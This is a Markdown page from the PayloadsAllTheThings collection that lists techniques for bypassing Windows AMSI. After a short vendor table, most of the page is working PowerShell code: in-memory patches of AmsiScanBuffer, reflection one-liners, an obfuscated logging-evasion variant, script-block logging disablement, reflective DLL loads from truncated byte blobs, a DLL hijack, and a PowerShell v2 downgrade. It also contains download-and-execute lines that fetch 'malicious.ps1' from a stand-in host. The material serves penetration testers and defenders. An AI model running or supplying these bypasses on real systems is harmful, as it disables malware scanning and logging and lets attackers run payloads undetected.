PayloadsAllTheThings/Methodology and Resources/Windows - AMSI Bypass.md

778 lines
166 KiB
Markdown
Raw Normal View History

2020-12-08 13:31:01 +00:00
# AMSI Bypass
## Summary
2022-11-03 20:31:50 +00:00
* [List AMSI Providers](#list-amsi-providers)
2021-03-24 11:44:35 +00:00
* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi)
2020-12-08 13:31:01 +00:00
* [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse)
* [Dont use net webclient](#Dont-use-net-webclient)
* [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch)
* [Forcing an error](#Forcing-an-error)
* [Disable Script Logging](#Disable-Script-Logging)
* [Amsi Buffer Patch - In memory](#Amsi-Buffer-Patch---In-memory)
* [Same as 6 but integer Bytes instead of Base64](#Same-as-6-but-integer-Bytes-instead-of-Base64)
* [Using Matt Graeber's Reflection method](#Using-Matt-Graebers-Reflection-method)
* [Using Matt Graeber's Reflection method with WMF5 autologging bypass](#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass)
* [Using Matt Graeber's second Reflection method](#Using-Matt-Graebers-second-Reflection-method)
* [Using Cornelis de Plaa's DLL hijack method](#Using-Cornelis-de-Plaas-DLL-hijack-method")
* [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2)
* [Nishang all in one](#Nishang-all-in-one)
* [Adam Chesters Patch](#Adam-Chester-Patch)
2021-03-24 21:26:23 +00:00
* [AMSI.fail](#amsifail)
2020-12-08 13:31:01 +00:00
2022-11-03 20:31:50 +00:00
## List AMSI Providers
* List providers with : `Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'`
* Find software from CLSID
```ps1
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}'
Name Property
---- --------
Hosts (default) : Scanned Hosting Applications
InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll"
```
2021-03-24 11:44:35 +00:00
## Which Endpoint Protection is Using AMSI
2022-11-03 20:31:50 +00:00
Small extract from [subat0mik/whoamsi](https://github.com/subat0mik/whoamsi) - An effort to track security vendors' use of Microsoft's Antimalware Scan Interface:
| Vendor/Product | AMSI | Date | Reference |
| -------- | -------- | -------- | -------- |
| Avast | Y | 03/20/2016 | https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884 |
| AVG | Y | 03/08/2016 | https://support.avg.com/answers?id=906b00000008oUTAAY |
| BitDefender Consumer | Y | 09/20/2016 | https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/ |
| BitDefender Enterprise | Y | 05/25/2021 | https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20 |
| Kaspersky Anti Targeted Attack Platform | Y | 10/10/2018 | https://help.kaspersky.com/KIS/2019/en-US/119653.htm |
| Symantec Advanced Threat Protection | Y | 07/15/2020 | https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html |
| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/
2021-03-24 11:44:35 +00:00
2020-12-08 13:31:01 +00:00
# Patching amsi.dll AmsiScanBuffer by rasta-mouse
```ps1
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
```
## Dont use net webclient
> Not Working anymore, there was a patch for it
```ps1
$webreq = [System.Net.WebRequest]::Create(https://maliciousscripturl/malicious.ps1)
$resp=$webreq.GetResponse()
$respstream=$resp.GetResponseStream()
$reader=[System.IO.StreamReader]::new($respstream)
$content=$reader.ReadToEnd()
IEX($content)
```
## The Short version of dont use powershell net webclient
> Not Working anymore, there was a patch for it
```ps1
IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1"))
```
# Amsi ScanBuffer Patch
Egghunter with blog post: https://www.contextis.com/us/blog/amsi-bypass
```ps1
Write-Host "-- AMSI Patch"
Write-Host "-- Paul Laîné (@am0nsec)"
Write-Host ""
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string lpLibFileName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Kernel32
Class Hunter {
static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
while ($true) {
[int]$count = 0
while ($true) {
[IntPtr]$address = [IntPtr]::Add($address, 1)
If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
$count++
If ($count -eq $egg.Length) {
return [IntPtr]::Subtract($address, $egg.Length - 1)
}
} Else { break }
}
}
return $address
}
}
[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
Write-Host "[+] AMSI DLL Handle: $hModule"
[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow")
Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress"
If ([IntPtr]::Size -eq 8) {
Write-Host "[+] 64-bits process"
[byte[]]$egg = [byte[]] (
0x4C, 0x8B, 0xDC, # mov r11,rsp
0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx
0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp
0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi
0x57, # push rdi
0x41, 0x56, # push r14
0x41, 0x57, # push r15
0x48, 0x83, 0xEC, 0x70 # sub rsp,70h
)
} Else {
Write-Host "[+] 32-bits process"
[byte[]]$egg = [byte[]] (
0x8B, 0xFF, # mov edi,edi
0x55, # push ebp
0x8B, 0xEC, # mov ebp,esp
0x83, 0xEC, 0x18, # sub esp,18h
0x53, # push ebx
0x56 # push esi
)
}
[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)
Write-Host "[+] Targeted address: $targetedAddress"
$oldProtectionBuffer = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null
$patch = [byte[]] (
0x31, 0xC0, # xor rax, rax
0xC3 # ret
)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)
$a = 0
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null
```
# Forcing an error
```ps1
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
```
# Disable Script Logging
```ps1
$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null);
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{}
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0")
```
```ps1
[Ref].Assembly.GetType("System.Management.Automation.ScriptBlock").GetField("signatures","NonPublic,static").SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
```
# Amsi Buffer Patch - In memory
```ps1
function Bypass-AMSI
{
if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String("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YXJkAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5SW5mb3JtYXRpb25hbFZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAGR3U2l6ZQBzaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAQWxsb2NIR2xvYmFsAE1hcnNoYWwAS2VybmVsMzIuZGxsAEFtc2lCeXBhc3MuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBvcF9BZGRpdGlvbgBaZXJvAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAFJ1bnRpbWVIZWxwZXJzAEFtc2lCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAARYQBtAHMAaQAuAGQAbABsAABXRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAGEAbQBzAGkALgBkAGwAbAAgAHAAbwBpAG4AdABlAHIALgAAHUEAbQBzAGkAUwBjAGEAbgBCAHUAZgBmAGUAcgAAc0UAUgBSAE8AUgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIAByAGUAdAByAGkAZQB2AGUAIABBAG0AcwBpAFMAYwBhAG4AQgB1AGYAZgBlAHIAIABmAHUAbgBjAHQAaQBvAG4AIABwAG8AaQBuAHQAZQByAAB1RQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAGMAaABhAG4AZwBlACAAQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByACAAbQBlAG0AbwByAHkAIABwAGUAcgBtAGkAcwBzA
Write-Output "DLL has been reflected";
}
[Bypass.AMSI]::Patch()
}
```
# Same as 6 but integer Bytes instead of Base64
```ps1
function MyPatch{
if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
[Reflection.Assembly]::Load([byte[]]@(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 27, 37, 18, 183, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 34, 32, 11, 1, 48, 0, 0, 14, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 94, 44, 0, 0, 0, 32, 0, 0, 0, 64, 0, 0, 0, 0, 0, 16, 0, 32, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 3, 0, 64, 133, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 44, 0, 0, 79, 0, 0, 0, 0, 64, 0, 0, 48, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 12, 0, 0, 0, 44, 43, 0, 0, 84, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 32, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 108, 12, 0, 0, 0, 32, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96, 46, 114, 115, 114, 99, 0, 0, 0, 48, 3, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 114, 101, 108, 111, 99, 0, 0, 12, 0, 0, 0, 0, 96, 0, 0, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 44, 0, 0, 0, 0, 0, 0, 72, 0, 0, 0, 2, 0, 5, 0, 64, 33, 0, 0, 236, 9, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 48, 4, 0, 217, 0, 0, 0, 1, 0, 0, 17, 0, 114, 1, 0, 0, 112, 40, 1, 0, 0, 6, 10, 6, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 6, 17, 6, 44, 20, 0, 114, 19, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 56, 165, 0, 0, 0, 6, 114, 107, 0, 0, 112, 40, 2, 0, 0, 6, 11, 7, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 8, 17, 8, 44, 17, 0, 114, 137, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 119, 26, 106, 40, 15, 0, 0, 10, 12, 22, 13, 7, 8, 31, 64, 18, 3, 40, 3, 0, 0, 6, 22, 254, 1, 19, 9, 17, 9, 44, 17, 0, 114, 255, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 72, 25, 141, 18, 0, 0, 1, 37, 208, 1, 0, 0, 4, 40, 16, 0, 0, 10, 19, 4, 25, 40, 17, 0, 0, 10, 19, 5, 17, 4, 22, 17, 5, 25, 40, 18, 0, 0, 10, 0, 7, 31, 27, 40, 19, 0, 0, 10, 17, 5, 25, 40, 4, 0, 0, 6, 0, 114, 117, 1, 0, 112, 40, 14, 0, 0, 10, 0, 22, 19, 7, 43, 0, 17, 7, 42, 34, 2, 40, 20, 0, 0, 10, 0, 42, 0, 0, 66, 83, 74, 66, 1, 0, 1, 0, 0, 0, 0, 0, 12, 0, 0, 0, 118, 52, 46, 48, 46, 51, 48, 51, 49, 57, 0, 0, 0, 0, 5, 0, 108, 0, 0, 0, 212, 2, 0, 0, 35, 126, 0, 0, 64, 3, 0, 0, 176, 3, 0, 0, 35, 83, 116, 114, 105, 110, 103, 115, 0, 0, 0, 0, 240, 6, 0, 0, 204, 1, 0, 0, 35, 85, 83, 0, 188, 8, 0, 0, 16, 0, 0, 0, 35, 71, 85, 73, 68, 0, 0, 0, 204, 8, 0, 0, 32, 1, 0, 0, 35, 66, 108, 111, 98, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 87, 149, 2, 52, 9, 2, 0, 0, 0, 250, 1, 51, 0, 22, 0, 0, 1, 0, 0, 0, 22, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 20, 0, 0, 0, 11, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 85, 2, 1, 0, 0, 0, 0, 0, 6, 0, 141, 1, 206, 2, 6, 0, 223, 1, 206, 2, 6, 0, 231, 0, 156, 2, 15, 0, 238, 2, 0, 0, 6, 0, 18, 1, 14, 2, 6, 0, 198, 1, 107, 2, 6, 0, 110, 1, 107, 2, 6, 0, 43, 1, 107, 2, 6, 0, 72, 1, 107, 2, 6, 0, 173, 1, 107, 2, 6, 0, 251, 0, 107, 2, 6, 0, 48, 3, 100, 2, 6, 0, 204, 0, 206, 2, 6, 0, 194, 0, 100, 2, 6, 0, 149, 2, 100, 2, 6, 0, 154, 0, 100, 2, 6, 0, 148, 2, 100, 2, 6, 0, 253, 1, 100, 2, 6, 0, 253, 2, 206, 2, 6, 0, 125, 3, 100, 2, 6, 0, 135, 0, 100, 2, 6, 0, 64, 2, 175, 2, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 1, 0, 1, 0,
Out-Null;
Write-Output "DLL has been reflected";
}
[Bypass.AMSI]::Patch();
}
MyPatch;
Start-Sleep 1;
```
# Using Matt Graebers Reflection method
```ps1
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
# Using Matt Graebers Reflection method with WMF5 autologging bypass
```ps1
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
```
## Using Matt Graebers second Reflection method
```ps1
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
```
## Using Cornelis de Plaas DLL hijack method
```ps1
[Byte[]] $temp = $DllBytes -split ' '
Write-Output "Executing the bypass."
Write-Verbose "Dropping the fake amsi.dll to disk."
[System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp)
Write-Verbose "Copying powershell.exe to the current working directory."
Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd
Write-Verbose "Starting powershell.exe from the current working directory."
& "$pwd\powershell.exe"
```
## Using PowerShell version 2
```ps1
if ($ShowOnly -eq $True)
{
Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process."
}
else
{
Write-Verbose "Checking if .Net version 2.0.50727 is installed."
$versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version
if($versions -match "2.0.50727")
{
Write-Verbose ".Net version 2.0.50727 found."
Write-Output "Executing the bypass."
powershell.exe -version 2
}
else
{
Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2."
}
}
```
## Nishang all in one
```ps1
function Invoke-AmsiBypass
{
<#
.SYNOPSIS
Nishang script which uses publicly known methods to bypass/avoid AMSI.
.DESCRIPTION
This script implements publicly known methods bypass or avoid AMSI on Windows machines.
AMSI is a script malware detection mechanism enabled by default in Windows 10.
(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx)
This script implements 6 methods of bypassing AMSI.
unload - Method by Matt Graeber. Unloads AMSI from current PowerShell session.
unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session.
unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging.
unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging.
dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell)
psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI.
The script also provides information on tools which can be used for obfuscation:
ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/)
Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation)
.PARAMETER Method
The method to be used for elevation. Defaut one is unloadsilent.
.PARAMETER ShowOnly
The bypass is not executed. Just shown to the user.
.EXAMPLE
PS > Invoke-AmsiBypass -Verbose
Above command runs the unloadsilent method.
.EXAMPLE
PS > Invoke-PsUACme -Method unloadobfuscated -Verbose
Above command runs the unloadobfuscated method.
.LINK
http://www.labofapenetrationtester.com/2016/09/amsi.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")]
[String]
$Method = "unloadsilent",
[Parameter(Position = 1, Mandatory = $False)]
[Switch]
$ShowOnly
)
$AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 